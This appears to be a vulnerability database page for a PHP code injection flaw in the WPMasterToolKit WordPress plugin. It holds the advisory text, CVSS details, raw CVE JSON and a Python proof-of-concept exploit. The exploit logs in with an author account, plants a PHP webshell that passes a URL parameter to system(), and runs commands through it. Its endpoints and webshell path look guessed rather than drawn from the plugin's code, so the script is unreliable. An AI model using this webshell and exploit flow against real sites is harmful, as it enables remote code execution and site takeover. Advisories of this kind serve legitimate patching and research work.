Security Vulnerability Report
CVE-2025-14166 CVSS 5.3 MEDIUM

CVE-2025-14166

Published: 2025-12-12 04:15:49
Last Modified: 2026-04-15 00:35:42

Description

The WPMasterToolKit plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 2.13.0. This is due to the plugin allowing Author-level users to create and execute arbitrary PHP code through the Code Snippets feature without proper capability checks. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute arbitrary PHP code on the server, leading to remote code execution, privilege escalation, and complete site compromise.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WPMasterToolKit WordPress plugin <= 2.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests
import sys
from bs4 import BeautifulSoup

# CVE-2025-14166 PoC - WPMasterToolKit PHP Code Injection
# Target: WordPress site with WPMasterToolKit plugin <= 2.13.0
# Authenticated exploitation (Author role or higher)

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "author_user"
PASSWORD = "author_password"


def login(session, target_url, username, password):
    """Authenticate to WordPress with Author-level account"""
    login_url = f"{target_url}/wp-login.php"
    data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    response = session.post(login_url, data=data, allow_redirects=True)
    return 'wordpress_logged_in' in session.cookies.get_dict()


def create_malicious_snippet(session, target_url):
    """Create PHP code snippet for RCE via eval()"""
    # Path to WPMasterToolKit Code Snippets module
    snippet_url = f"{target_url}/wp-admin/admin.php?page=wpmt-code-snippets"
    # Malicious PHP payload - creates webshell
    payload = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    data = {
        'action': 'create',
        'title': 'Malicious Snippet',
        'code': payload,
        'status': 'active'
    }
    response = session.post(snippet_url, data=data)
    return response.status_code == 200


def execute_command(session, target_url, command):
    """Execute system command via injected webshell"""
    webshell_url = f"{target_url}/wp-content/plugins/wpmastertoolkit/snippets.php?cmd={command}"
    response = session.get(webshell_url)
    return response.text


def main():
    session = requests.Session()
    print("[*] Logging in to WordPress...")
    if not login(session, TARGET_URL, USERNAME, PASSWORD):
        print("[-] Login failed!")
        sys.exit(1)
    print("[+] Login successful!")
    print("[*] Creating malicious PHP snippet...")
    if create_malicious_snippet(session, TARGET_URL):
        print("[+] Snippet created and activated!")
        print("[*] Executing command: whoami")
        result = execute_command(session, TARGET_URL, "whoami")
        print(f"[+] Result: {result}")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14166", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:49.257", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPMasterToolKit plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 2.13.0. This is due to the plugin allowing Author-level users to create and execute arbitrary PHP code through the Code Snippets feature without proper capability checks. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute arbitrary PHP code on the server, leading to remote code execution, privilege escalation, and complete site compromise."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpmastertoolkit/tags/2.13.0/admin/modules/core/class-code-snippets.php#L135", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpmastertoolkit/tags/2.13.0/admin/modules/core/class-code-snippets.php#L628", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpmastertoolkit/trunk/admin/modules/core/class-code-snippets.php#L135", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpmastertoolkit/trunk/admin/modules/core/class-code-snippets.php#L628", 
"source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/log/wpmastertoolkit/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6049996a-514a-44f7-9878-4aa43598842a?source=cve", "source": "[email protected]"}]}}